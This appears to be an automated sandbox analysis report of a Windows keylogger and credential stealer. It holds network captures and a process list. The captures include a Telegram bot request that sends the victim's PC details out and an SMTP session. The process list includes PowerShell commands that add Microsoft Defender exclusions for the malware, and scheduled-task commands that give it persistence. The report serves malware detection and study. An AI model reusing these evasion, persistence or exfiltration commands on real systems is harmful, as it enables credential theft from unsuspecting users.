                                                                              2024-10-01 08:55:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-01 08:55:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.549734188.114.97.34437308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-01 08:55:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-01 08:55:32 UTC671INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:32 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 31
                                                                              Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2ouPpv9Ma7nLraVcaEKvwCDl5X%2FyHvc%2B2Tg8i0lsPOMixtAFQoHx0Ax8za2oaWxo032z7RF5ICyj07zfbxedy99q70mEygKIsTZNBwWdHbLeUc9L30zD1O5CjXCpwKAAyIboQeg"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cbb3bfad84e6a5f-EWR
                                                                              2024-10-01 08:55:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-01 08:55:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.549736188.114.97.34437308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-01 08:55:33 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-01 08:55:33 UTC679INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:33 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 32
                                                                              Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evb4DuVI%2FLRL5PQY3NOa0FjGcavqIHk9o%2BXFR%2F5mavo7Kg7SNJud4O93U%2B6N0CgTboCOnwuYYi1rJ2YtjlqGDu%2FMZTERike%2F34YfYQhfiafLsIH7m3vOWCzoNyOezljBkxGNYaW3"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cbb3c02fa468cdd-EWR
                                                                              2024-10-01 08:55:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-01 08:55:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.549739188.114.97.34437308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-01 08:55:34 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-01 08:55:34 UTC671INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:34 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 33
                                                                              Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLnKVL74ndJAdXISjWhKVl9Enb8tstpaKjSwd9i0mW1bgx8%2BuVdwEc0a98wM4fUqP0XYuOYnGiwJymNgq1MA5ZgzM3FVk8Nq%2F3stgOd4N3DsCUlKVY0q0AG992mse8tImb3OleQW"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cbb3c0abcb143ee-EWR
                                                                              2024-10-01 08:55:34 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-01 08:55:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.549743188.114.97.34437308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-01 08:55:36 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-01 08:55:36 UTC669INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:36 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 35
                                                                              Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YjMz55u1aaIguWuCl5sERJ5om8hAfv7ZCad9P4x90G9VUEsQLoywf4z2s%2BFJw96OcJ0l0XE62UlTrbu8UOZua3by5dDjzdUBBGW6OlESv7ECNGul8BIwCR1Bj3DOQOhXVCJiLqfE"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cbb3c1449d75e7d-EWR
                                                                              2024-10-01 08:55:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-01 08:55:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.549744149.154.167.2204437308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-01 08:55:37 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2002/10/2024%20/%2021:40:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                              Host: api.telegram.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-01 08:55:37 UTC344INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0
                                                                              Date: Tue, 01 Oct 2024 08:55:37 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 55
                                                                              Connection: close
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                              2024-10-01 08:55:37 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                              Oct 1, 2024 10:55:43.713464975 CEST5874974575.102.58.14192.168.2.5220-sc-europe110.banahosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 10:55:43 +0200
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Oct 1, 2024 10:55:43.713819027 CEST49745587192.168.2.575.102.58.14EHLO 065367
                                                                              Oct 1, 2024 10:55:43.886593103 CEST5874974575.102.58.14192.168.2.5250-sc-europe110.banahosting.com Hello 065367 [8.46.123.33]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPECONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Oct 1, 2024 10:55:43.886831999 CEST49745587192.168.2.575.102.58.14STARTTLS
                                                                              Oct 1, 2024 10:55:44.060343027 CEST5874974575.102.58.14192.168.2.5220 TLS go ahead

                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:04:54:55
                                                                              Start date:01/10/2024
                                                                              Path:C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
                                                                              Imagebase:0xbd0000
                                                                              File size:769'536 bytes
                                                                              MD5 hash:102C9CE1C659517C4EA924C2044305B7
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:04:54:56
                                                                              Start date:01/10/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
                                                                              Imagebase:0xfb0000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:04:54:56
                                                                              Start date:01/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:04:54:56
                                                                              Start date:01/10/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe"
                                                                              Imagebase:0xfb0000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:04:54:56
                                                                              Start date:01/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:04:54:56
                                                                              Start date:01/10/2024
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp"
                                                                              Imagebase:0xb10000
                                                                              File size:187'904 bytes
                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:04:54:56
                                                                              Start date:01/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:04:54:58
                                                                              Start date:01/10/2024
                                                                              Path:C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
                                                                              Imagebase:0xae0000
                                                                              File size:769'536 bytes
                                                                              MD5 hash:102C9CE1C659517C4EA924C2044305B7
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4473996288.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:10
                                                                              Start time:04:54:58
                                                                              Start date:01/10/2024
                                                                              Path:C:\Users\user\AppData\Roaming\AcEnrS.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\AcEnrS.exe
                                                                              Imagebase:0x120000
                                                                              File size:769'536 bytes
                                                                              MD5 hash:102C9CE1C659517C4EA924C2044305B7
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 47%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:04:55:00
                                                                              Start date:01/10/2024
                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                              Imagebase:0x7ff6ef0c0000
                                                                              File size:496'640 bytes
                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:04:55:02
                                                                              Start date:01/10/2024
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp"
                                                                              Imagebase:0xb10000
                                                                              File size:187'904 bytes
                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:04:55:03
                                                                              Start date:01/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:04:55:03
                                                                              Start date:01/10/2024
                                                                              Path:C:\Users\user\AppData\Roaming\AcEnrS.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\AcEnrS.exe"
                                                                              Imagebase:0x540000
                                                                              File size:769'536 bytes
                                                                              MD5 hash:102C9CE1C659517C4EA924C2044305B7
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:04:55:18
                                                                              Start date:01/10/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7708 -s 1500
                                                                              Imagebase:0xfe0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:10.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:159
                                                                                Total number of Limit Nodes:6
                                                                                execution_graph 24125 2ec4668 24126 2ec467a 24125->24126 24127 2ec4686 24126->24127 24129 2ec4778 24126->24129 24130 2ec479d 24129->24130 24134 2ec4888 24130->24134 24138 2ec4879 24130->24138 24135 2ec48af 24134->24135 24136 2ec498c 24135->24136 24142 2ec44c4 24135->24142 24140 2ec48af 24138->24140 24139 2ec498c 24139->24139 24140->24139 24141 2ec44c4 CreateActCtxA 24140->24141 24141->24139 24143 2ec5918 CreateActCtxA 24142->24143 24145 2ec59db 24143->24145 24146 7734dd7 24148 7734dc4 24146->24148 24147 7734dd3 24148->24147 24152 7737b50 24148->24152 24166 7737bfe 24148->24166 24181 7737b58 24148->24181 24153 7737b58 24152->24153 24164 7737b96 24153->24164 24195 7738087 24153->24195 24200 7738242 24153->24200 24205 77380c3 24153->24205 24210 773829c 24153->24210 24214 7737ff0 24153->24214 24218 77383d1 24153->24218 24222 7738953 24153->24222 24226 773848e 24153->24226 24231 77386c9 24153->24231 24235 773840b 24153->24235 24240 7738125 24153->24240 24164->24148 24167 7737b8c 24166->24167 24169 7737c01 24166->24169 24168 7737b96 24167->24168 24170 7738953 2 API calls 24167->24170 24171 77383d1 2 API calls 24167->24171 24172 7737ff0 2 API calls 24167->24172 24173 773829c 2 API calls 24167->24173 24174 77380c3 2 API calls 24167->24174 24175 7738242 2 API calls 24167->24175 24176 7738087 2 API calls 24167->24176 24177 7738125 2 API calls 24167->24177 24178 773840b 2 API calls 24167->24178 24179 77386c9 2 API calls 24167->24179 24180 773848e 2 API calls 24167->24180 24168->24148 24169->24148 24170->24168 24171->24168 24172->24168 24173->24168 24174->24168 24175->24168 24176->24168 24177->24168 24178->24168 24179->24168 24180->24168 24182 7737b72 24181->24182 